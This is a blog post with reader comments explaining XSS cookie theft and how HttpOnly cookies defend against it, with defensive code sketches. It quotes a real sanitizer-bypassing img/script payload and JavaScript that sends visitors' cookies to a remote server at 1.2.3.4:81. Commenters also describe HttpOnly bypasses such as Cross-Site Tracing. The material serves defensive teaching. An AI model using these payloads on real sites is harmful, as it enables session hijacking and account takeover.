Protecting Your Cookies: HttpOnly

August 28, 2008

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.

Most of the time when you accept input from the user the very first thing you do is pass it through an HTML encoder. So tricksy things like:

<script>alert('hello XSS!');</script>

are automagically converted into their harmless encoded equivalents:

&lt;script&gt;alert('hello XSS!');&lt;/script&gt;
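
As a minimal sketch of that encoding step, here it is with the html.escape function from Python's standard library. Python and the variable names are my choice for illustration only; any platform's HTML encoder does the same job.

```python
import html

# Untrusted text exactly as a user might submit it.
user_input = "<script>alert('hello XSS!');</script>"

# html.escape replaces &, <, and > with entities. With quote=True (the
# default) it also encodes double and single quotes, which matters when
# the text ends up inside an attribute value.
encoded = html.escape(user_input)

print(encoded)
```

Note that the default settings also encode the single quotes (as &#x27;), which goes slightly further than the encoded line shown above; passing quote=False leaves them alone.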

In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.
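
One way to lean toward failing safe, sketched here under my own assumptions and not a description of what my friend's sanitizer did: encode everything first, then restore only an exact, attribute-free list of tags. The tag list and the function name sanitize are hypothetical.

```python
import html
import re

# Hypothetical allow-list: attribute-free formatting tags only.
ALLOWED_TAGS = ("b", "i", "em", "strong", "pre", "code")

# Matches an already-encoded opening or closing tag such as "&lt;b&gt;" or
# "&lt;/b&gt;". Anything with attributes, whitespace, or odd casing inside
# the brackets does not match and therefore stays encoded.
_ENCODED_TAG = re.compile(r"&lt;(/?)(%s)&gt;" % "|".join(ALLOWED_TAGS))


def sanitize(untrusted: str) -> str:
    """Encode everything, then restore only exact allow-listed tags."""
    encoded = html.escape(untrusted)
    return _ENCODED_TAG.sub(r"<\1\2>", encoded)


print(sanitize("<b>bold</b> and <script>alert(1)</script>"))
```

The appeal of this shape is that anything the pattern doesn't recognize stays encoded. It does not balance tags, though, so a stray closing tag can survive, and it is no help at all once you need attributes such as links.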

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:

window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!

As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.

If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.

When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:

  1. A modern web browser
  2. A browser that actually implements HttpOnly correctly

The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a browser which isn't exactly known for its iron-clad security record.

Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838
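
If your framework doesn't set the flag for you, producing that header yourself is not much work. Here's a minimal sketch using Python's standard http.cookies module; the cookie name session_id is made up for illustration, and the value is borrowed from the response above.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session_id"] = "ig2fac55"        # hypothetical cookie name
cookie["session_id"]["path"] = "/"
cookie["session_id"]["httponly"] = True  # adds the HttpOnly attribute

# output() renders a complete "Set-Cookie: ..." header line.
header_line = cookie.output()
print(header_line)
```

The attribute order in the rendered line may differ from the ASP.NET output above; browsers don't care about the order.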

This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre-YouTube.

HttpOnly cookies can in fact be remarkably effective. Here's what we know:

  • HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
  • HttpOnly removes cookie information from the response headers in XMLHttpRequest.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
  • XMLHttpRequests may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.

The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpRequest. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.

Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!

HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
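
Since it's a set-it-and-forget-it setting, it's worth checking that it actually got set. Here's a rough sketch of such a check, assuming you can get the raw response headers as text; the function name cookies_missing_httponly and the theme cookie are invented for the example.

```python
from typing import List


def cookies_missing_httponly(raw_headers: str) -> List[str]:
    """Return the names of cookies that were set without HttpOnly."""
    missing = []
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "set-cookie":
            continue
        # The first ';'-separated part is "name=value"; the rest are attributes.
        parts = [p.strip() for p in value.split(";")]
        attributes = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "httponly" not in attributes:
            missing.append(parts[0].split("=", 1)[0])
    return missing


# Two cookies from the response shown earlier, plus a hypothetical
# "theme" cookie that was set without the flag.
sample = (
    "HTTP/1.1 200 OK\n"
    "Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly\n"
    "Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly\n"
    "Set-Cookie: theme=dark; path=/\n"
)
print(cookies_missing_httponly(sample))
```

A check like this only tells you the flag was sent. Whether a given browser honors it everywhere is a separate question, as the caveats above show.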

Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.

(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)

Posted by Jeff Atwood
165 Comments

Several questions have come up:

Why was HttpOnly implemented by Microsoft on IE6 first?
Why is HttpOnly broken on Firefox?
Why is it not on all browsers?
Why is it not a standard?

All of these have one answer - it is a patch to fix a symptom of bad coding and not a solution

It fixes (or partly fixes) one security hole out of a huge number, it is not a universal fix ...

You should sanitize properly everything from the user or you will have a security problem ...

Jaster on September 1, 2008 5:37 AM

"I'd like to see someone crack my PHP HTML sanitizer ..."

Google for htmlspecialchars vulnerability...

giggles on September 1, 2008 8:11 AM

@correct you missed the point entirely and I have a hard time believing that you read what I had to say. Then again I think your comment's been sanitized because I find your latest response barely intelligible. Command-line escaping? wtf?

@bex and others, you can't, from today's web servers, have enough information to detect all spoofed attacks, even with encrypted cookies. Buy a good stateful router/firewall, that's my only point.

Also, you don't just need to worry about XSS. You also need to worry about anything else in between you and a web site that steals cookies. If your friend next to you can steal your cookie, he can 'replay' an action and pretend to be you.

Also, can anyone explain why the ajax double-cookie is any sort of remedy? Maybe I'm just thick, but I don't see why it's a silver bullet.

Also, if you only send authentication cookies over https, and never in plaintext, would xss exploits be able to steal them?

O''Malley on September 1, 2008 8:34 AM

Why the insistence that IE7 is less broken than Firefox in regards to HttpOnly? I see the same bug in both at http://ha.ckers.org/httponly.cgi

Dan Veditz on September 1, 2008 9:55 AM

Already pointed out, but just to show a more practical way to bypass HTTPOnly cookies, take a look at XSS Tunnelling - http://labs.portcullis.co.uk/application/xss-tunnelling/xss-tunnel/

Basically it's a defense in depth approach and quite cheap to implement but obviously not the silver bullet.

FM on September 1, 2008 10:27 AM

Re: validating IP - as others have mentioned, the assumption that changed IP == attempted hack will run into false-positive problems on users from some banks (and perhaps other large companies / AOL users / whatever, but I'm sure about the banks). It's unfortunate.

ways on September 2, 2008 7:31 AM

Wouldn't...

XMLHttpRequest.prototype.__defineGetter__('getAllResponseHeaders', function(){ });

be a good workaround for Firefox's issue?

Sean on September 2, 2008 12:47 PM

Now they'll have to copy the html of the login screen with the expired session message and have their javascript output that instead of stealing the cookies.

David on September 2, 2008 12:57 PM

So, where's the post on what exactly was wrong with the html sanitizer and how exactly you fixed it? Or is that too narrow a focus for the blog? :)

Debt Consolidation on September 2, 2008 1:31 PM

The only secure computer is one that is unplugged and (in the case of a laptop) has had its battery removed.

Hell, they're even claiming now that microwaves at a specific frequency and intensity can affect the ole analog 'wet' computer...

mac on September 2, 2008 1:35 PM

@omalley:

"@correct you missed the point entirely and I have a hard time believing that you read what I had to say."

I read what you said.

"Then again I think your comment's been sanitized because I find your latest response barely intelligible."

I'm not surprised.

"Maybe I'm just thick"

...

correct on September 2, 2008 1:59 PM

"It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user."

You do.

mbhunter on September 3, 2008 2:25 AM

@Jonah hits it on the head. There's always a way to hijack a session, even if it's walking up to an unattended computer. Any critical / costly action should require the user to retype their password (or some secondary authentication method).

At least HttpOnly can try to limit what browser scripts can do, and it's a step in the right direction, but as others point out, it's not yet a total fix.

Another fix I can think of would be if running script couldn't load other scripts on the fly (i.e. via eval), and your web framework would inspect every page's output and remove any script references, and perhaps even not allow inline scripts. Then you could be a lot safer.

Unfortunately there are a lot of vectors of attack, and it's currently very easy for a developer to screw up.

not correct on September 3, 2008 2:55 AM

@ Jonah, I think you're right - when making profile changes etc a password should always be required. Good point indeed.

I'm looking at implementing commenting etc on my site (it's a blog, but I don't care too much about the parsing of the blog entries since I'm the only one making them). I was wondering where the author stated that you can't clobber every questionable thing that comes through - Why not? I was thinking of just parsing all angle brackets to their entity codes and then running through the script to look for acceptable tags, but instead of looking at tag letters between < and > brackets, I'd look at letters between entity codes.

Is there anything glaringly wrong with this approach? Script stuff wouldn't get through because I would only allow specific tags such as strong, em, u, strike etc.

Nick Coad on September 3, 2008 7:15 AM

@bex: B, I, UL, OL, LI, PRE, CODE, STRIKE, and BLOCKQUOTE
If you expect your users to want BLOCKQUOTE, UL, and OL, you should probably be using a smarter text markup language (MediaWiki-esque) in the first place. ISTR Jeff was considering this route for stackoverflow a while back, but rejected it.

My list of HTML tags needed in this blog comment section: P, B, I, S (and possibly STRIKE), (might as well throw in U for completeness), TT (or CODE), PRE, A HREF (with obviously well-formed URLs only). A NAME is too abusable. SMALL might be nice, but it's abusable. BIG is too abusable.

Anonymous Cowherd on September 3, 2008 7:28 AM

RE "Another fix" and "remove any scripts references": I neglected to say the web framework would remove any script references that you didn't explicitly allow, which outside of DNS poisoning would pretty much nail the coffin around many XSS.

Then again, it's all a giant band-aid as everything is sent plain-text. It takes only 1 compromised router.........

not correct on September 3, 2008 7:40 AM

It's actually not that complicated. HTML-encode everything, so for example <b> becomes &lt;b&gt;, etc. Then selectively use text substitution to re-enable what you want, i.e. '&lt;b&gt;' => '<b>'.
Everything else remains escaped.

Tony

Tony BenBrahim on September 3, 2008 12:08 PM

There seems to be a huge emphasis on cookie stealing, but don't forget that XMLHttpRequest is extremely dangerous since it can mimic any user action! What if an XSS script loads the user profile form, changes the email address, and then requests a new password be sent to it (via the common "Forgot password" form)? The account is hijacked without even touching a cookie. Place additional security around these sensitive areas and do not rely solely on the HttpOnly directive.

Jonah on September 3, 2008 1:34 PM

I think what you should implement is explained clearly in the following paper:
http://www.cse.msu.edu/~alexliu/publications/Cookie/cookie.pdf

Serkan on September 3, 2008 1:54 PM

I didn't have much of a clue about cookies. This article has opened up a lot of things for me. Thanks buddy.

Web Programming on September 4, 2008 3:02 AM

pick a schedule and stick to it

Is this blog dying?

me on September 4, 2008 3:46 AM

Robert C. Barth said: "Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?

I'm surprised this isn't a standard practice... is there some gotcha to this I haven't thought of? I'm not a web developer myself, so there could be a simple 'yeah, but' to this solution."

The problem with this is that users with a fast-switching dynamic IP would be continuously prompted to log in again.

Tony on September 4, 2008 6:28 AM

I second Kyle, I have been waiting for the latest in hackery... And I am getting rather impatient. Sorry, but I love this blog.... A lot...

Braden on September 4, 2008 9:08 AM

Where are the new blogs!!! I am getting antsy =) just wondering

Kyle Woodbury on September 4, 2008 10:05 AM

I wouldn't worry about users with fast switching dynamic IPs. They have a bigger issue that'll plague them until they find a real ISP.

David on September 4, 2008 12:59 PM

oh cool, this information is really useful and definitely is comment worthy! hehe.

The Planes on September 5, 2008 2:19 AM

Where are you Jeff??????!!!!

How come you average a good 16-20 posts a month for 4 years and as soon as I start reading, it drops to once a week? So far I'm contenting myself with trawling through back issues, but, you know. When will normal service be resumed? What about Mr Post Often Post Regular?

Tobermory on September 5, 2008 2:45 AM

How come you average a good 16-20 posts a month for 4 years and as
soon as I start reading, it drops to once a week? So far I'm
contenting myself with trawling through back issues, but, you know.
When will normal service be resumed?

I guess you haven't worked your way up to the August 24 post:
You may have noticed that my posting frequency has declined over
the last three weeks. That's because I've been busy building that
Stack Overflow thing we talked about.

T.E.D. on September 5, 2008 3:08 AM

*More Crickets Chirp*

Simucal on September 5, 2008 3:47 AM

Nice blog, I'm glad to find it. I would not mind if it would be updated every day - thank you for the good advice.

Mina Jade on September 5, 2008 4:54 AM

(crickets chirping)

Shmork on September 5, 2008 12:42 PM

Agreed, I checked the page directly in case my Google tool had broken (again). Must be really enjoying the Labor Day weekend.

Matt Ridley on September 5, 2008 1:33 PM

(as in, by Monday)

rofl

don't go getting too big for your boots!

Shdick on September 6, 2008 3:03 AM

p.s. jeff did you ever make a webapp before? your last few posts have been a bit.. entry-level.

Shdick on September 6, 2008 3:05 AM

I see a lot of comments wondering where Jeff has gotten to. Well, I think it's a tad unfair and unrealistic to expect him to be able to post numerous times per week for the rest of eternity. I'll happily keep checking back each day until a new post appears :)

I'm sure normal service will resume, he's probably busy at work, or if not, having some much deserved time to himself.

Alasdair on September 6, 2008 7:05 AM

Well it seems pretty likely that he's trying to put off his next post until it can be the debut of Stack Overflow.

Which, you know, I'm actually in favor of. Looks like a useful site, from the screenshots I've seen.

But it's been now well over a week since the last post. Obviously things are taking a little more time than he thought. Which again, I understand -- how many times have we all been in that position where we're JUST about ready to send something off and, oh, there's a little bug here, and oh, just gotta remember to fix that up here, and oh, CRAP the whole thing is falling apart now, and oh, damn damn damn, and oh....

But come on Jeff! We're your lifeblood here. We are your base! Throw us a bone. Most of us aren't in on the Beta so we're just sitting here with a dead blog, and the coming soon page on stackoverflow.com is pretty uninspiring. We got nothing! If it isn't a sure thing that you'll have something spectacular soon (as in, by Monday), at least just give us a little heads-up, something to gnaw on...

(Unless, of course, Jeff has been hit by a car or some other unforeseeable tragedy. In which case I eat my hat.)

Shmork on September 6, 2008 9:24 AM

Are you dead?

Dave on September 7, 2008 3:15 AM

I'm just makin' suggestions, not demands. It'll be almost two weeks without a peep if it goes much longer...

Shmork on September 7, 2008 6:24 AM

Seems to me like the perfect time for a post about maintaining relationships with your clients. Stack Overflow may become a success or might fail, but you've become a name by providing regular posts on codinghorror.com. Now you are moving on to bigger and better things you should not neglect the people who have afforded you the opportunity to make this your career choice.
Your posts of late have been infrequent and in all honesty not up to your usual standard. We, your readers, are still here. But we won't be forever.

Bryn on September 7, 2008 11:12 AM

Jeff, say something....

Niyaz PK on September 7, 2008 11:56 AM

If you're able to forget to HTML-encode some user input, you're probably also just concatenating strings of text. If you build your pages using proper XML tools, there is no conceivable way that you can accidentally include unsanitized user input in the page.

clockwork on September 9, 2008 5:07 AM

Well, judging from the new post the mystery of Jeff's absence is seriously solved.

DennisSC on September 13, 2008 4:49 AM

Besides the fact (which you mention) that you can still perform other, non-cookie-related XSS attacks, there is another way to bypass httpOnly protections, regardless of the browser - using XSS to do a Cross-Site Tracing (XST) attack.
If the server supports the TRACE method, the malicious script can send a TRACE request and parse the response (which will contain the cookie).
Worse yet, even if the server does not support TRACE, but one of the proxies on the way does (can be reverse proxy, or even the user's organizational proxy), XST can still be accomplished by sending the TRACE request to the proxy...

BUT regardless of XST, I still highly recommend using httpOnly. At least it will block non-XST attacks...

AviD on September 23, 2008 10:41 AM

This blog post is wrong on one key issue - ie7 is still very vulnerable to the XMLHttpRequest exposure of HTTPOnly cookies via response headers.

The fact is, the only browser that locks down this vector is ie8 beta - but FireFox 3.1 will surely lock down this vector. https://bugzilla.mozilla.org/show_bug.cgi?id=380418

The latest version of ie7 (as of this writing), 7.0.6001.18000, still exposes HTTPOnly cookies via set-cookie headers in XMLHttpRequest.getAllResponseHeaders().

Jim Manico on September 24, 2008 5:37 AM

The latest version of ie8 beta 2 (as of this writing), 8.0.6001.18241, also exposes HTTPOnly cookies via set-cookie headers in XMLHttpRequest.getAllResponseHeaders(). FireFox 3.1 is on track to close this hole, see: https://bugzilla.mozilla.org/show_bug.cgi?id=380418

Jim Manico on September 26, 2008 8:27 AM

Great post, thanks !
This helps a lot.

Naor Rosenberg on November 25, 2008 8:02 AM

If your forum allows HTML, there's no substitute for a _real_ HTML parser.

Daelin the Cruel on January 14, 2009 1:27 AM

Ok - if you update the MSXML Core Services at http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx then IE 8 Beta 2 will prevent HTTPOnly cookies from being read by XMLHTTPRequest (headers) within IE. This is an obscure vector, but IE 8 Beta 2 is the only browser that truly stops set-cookie leakage in headers via javascript. However, to get really crazy, ie 8 beta 2 with MS08-069 still leaks set-cookie2 HTTPOnly cookies in XMLHTTPRequest headers.

FireFox is on track to fix this obscure vector, completely. The FireFox patch at XMLHTTPRequest is marked RESOLVED FIXED and will go live shortly. (https://bugzilla.mozilla.org/show_bug.cgi?id=380418)

Even Safari/Chrome will see complete set-cookie/set-cookie2 XMLHTTPRequest exposure (https://bugs.webkit.org/show_bug.cgi?id=10957) protection shortly - the patch is complete as of 12/21/08

Final really obscure note, the OWASP WEBGOAT HTTPOnly lab is broken and does not show IE 8 Beta 2 with ms08-069 as complete in terms of HTTPOnly protection. However, Robert Hansen's test page now includes set-cookie and set-cookie2 checks for XMLHTTPRequest exposure and should be used until OWASP fixes http://code.google.com/p/webgoat/issues/detail?id=18

Jim Manico on January 23, 2009 12:13 PM

Or you can do something crazy like... Oh, I dunno, not trust the client for everything.

When I create a session on my (PHP) site the client receives two cookies: ID and HASH. The ID in the database of the session and a random hash (md5(constant.time().mt_rand(1,9999999))) which is associated with the session and used in looking it up.

From there, I also generate a 'security hash' server side with each request that is basically: md5($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT'].$_SERVER['HTTP_X_FORWARDED_FOR']); This hash is compared against the security hash stored upon login. If it doesn't match, you don't associate with the session. On top of this, there is an inactivity timeout and an absolute timeout on each session (1 hr and 3 hrs respectively).

So, in order to hijack a session, you'd have to obtain the ID and HASH cookies as you described (or through some other method), manage to fool my web server into thinking you're using the actual client's IP, and realize what the final piece is and forge your user-agent to match the actual client's. All within at MOST 3 hours.

CSRF, on the other hand, this provides no protection against :)

NuclearDog on March 16, 2009 1:15 PM

Any chance you'll update the refactormycode snippet to include the security fixes you put in as a result of this rude awakening?

Tristan on July 24, 2009 3:45 AM

Don't forget those of us with dual load balanced internet connections, in your proposed solutions. Every other request comes from a different IP address (a set of two, in this case).

Bryce on August 11, 2009 11:01 AM

Well, yeah. That's what happens when you think a sanitiser should try and clean the input. Another approach is to run a full HTML parser and construct a DOM tree from the document. Filter said DOM tree. Regenerate HTML from this tree.

Valid HTML will get through unscathed. Slightly incorrect but harmless HTML may even end up fixed. Bad will either end up filtered out of the DOM tree or so mangled that the XSS attack won't work (trickery like what's just given will fall flat and probably turn into img src= )

Anon on February 6, 2010 10:38 PM

I see a bunch of misinformation and misunderstandings flying around here.

First, HTTP connections are over TCP, not UDP. That means the IP address of an HTTP connection can not readily be spoofed against any system with good TCP sequence number randomization, which in turn means unless your server is running on some absolutely ancient OS they should not be spoofable. IP spoofing over UDP = easy, IP spoofing over TCP = hard. That means that it would indeed be useful to encode the IP address as part of the session cookie.

Second, to Jeff: Is your core intent here to build a working website, or to show the world what a macho programmer you are? If it's the former, you damn well should be building on solid components, and you certainly should consider a well-tested input validator and sanitizer as one of them, if you could find a suitable one.

Third, the concept of input sanitizer is highly questionable, as a couple people said; this is a good example of why. Trying to helpfully clean up toxic input goes right along with trying to remove that virus from the application document before you pass it along to the user. Don't sanitize bad input; reject it (preferably handling it with gloves and tongs in the process.)

Fourth, even input validation should be based on matching and accepting a limited (as in brain-dead-simple) subset of valid constructs, not on attempting to match and reject invalid constructs. Anything which doesn't clearly match a limited set of valid values should be tossed (or in a posting context, fed back to the sender with an invitation to correct it.)

There is a lot of well-developed and hard-earned wisdom about how to write security-conscious software. It starts with learning about the topic, and then not rejecting basic principles because "I want to do it my way!"

You're expecting a lot of people to trust you here; time to step up and live up to that trust.

Clifton on February 6, 2010 10:38 PM

So instead of actually fixing the problem (by, say, using a real HTML parser/sanitizer and getting rid of scripts), you've chosen to put on a second band-aid which doesn't even work the way it's supposed to half the time.

Well played. Don't bother trying to cure the disease, just treat the symptoms.

This is proof positive of the importance of creating a good design at the very beginning. Not only is it hard to fix mistakes in the design later on, but developers and geeks in general are ridiculously stubborn and can't bear the idea of having made a serious mistake; they'd rather just patch it up one way or another, until the patch fails and they have to make another patch, and so on and so forth. Not a good situation.

Aaron G on February 6, 2010 10:38 PM

Kris, authentication cookies ARE encrypted. This isn't an issue of privilege escalation by modifying a cookie, it's a simple replay attack.

And with respect to another comment - I wouldn't say that it's technically a blacklist, it really is a whitelist, but the problem is that *it doesn't fail safe*.

A strict parser fails safe. If it can't parse a tag, it just fails on it and the cruft disappears from subsequent output. This uber-dumb sanitizer can choke on all kinds of invalid input and proceed to ignore it (i.e. leave it the way it is), but the browser, being liberal in what it accepts as Jeff also loves to advocate, will happily try to fix it up and execute whatever badness is inside.

To believe that a few clunky regular expressions would be equally effective is pure geek conceit.

Aaron G on February 6, 2010 10:38 PM

You really want something the equivalent of Perl's taint-checking on input, but adapted to different classes of data.

This might be a good project to try out the idea Raganwald (Reg Braithwaite) was kicking around a while back in the context of Haskell/ML strongly-typed languages:

Create distinct derived types of strings for data which comes from various contexts and data which may be put into certain contexts. For example, you have UntrustedString and its derived classes UntrustedHeaderValue and UntrustedFormInput. You have a distinct type family of strings for stuff to store in the DB, DBSafeURIString, DBSafeNoHTMLString and DBSafeValidatedHTMLString, and another family for things which may be output back to the browser, for instance StringWithNoHTML, and URIEncodedURIString, and FormattedHTMLString.

You then make your validation functions return these very specific types, as appropriate for what they do, for instance accepting a UntrustedFormInput and returning a DBSafeNoHTMLString, and you let the compiler help you spot, for instance, that you are taking UntrustedFormInput and trying to directly store it as a DBSafeNoHTMLString, or are using a DBSafeValidatedHTMLString in a display function which expects a StringWithNoHTML.

Just saying "I'll HTML-encode all inputs before I store them" doesn't necessarily make anything safer; it's all context dependent. Maybe you HTML-encoded it but you needed to URI-encode it, or vice-versa. Or maybe you just forgot. This doesn't help with the specific problem here of just failing to screen some of the cases you need to validate, but in theory it should help. (Never tried it.)

Clifton on February 6, 2010 10:38 PM

Can't people edit cookies no matter what? They are all stored in a file somewhere on a computer, so people (especially) in linux, for example, could edit this file through terminal (assuming it's read only for normal users), and easily edit the cookies.

Jon Neal on February 6, 2010 10:38 PM

Great post - I'm HttpOnly's newest fan and user. Thanks Jeff.

David Underhill on July 24, 2010 1:02 PM

I have never realized this earlier and now onward I will definitely take care.
Thanks

Lmpandey on January 17, 2011 7:21 AM

The comments to this entry are closed.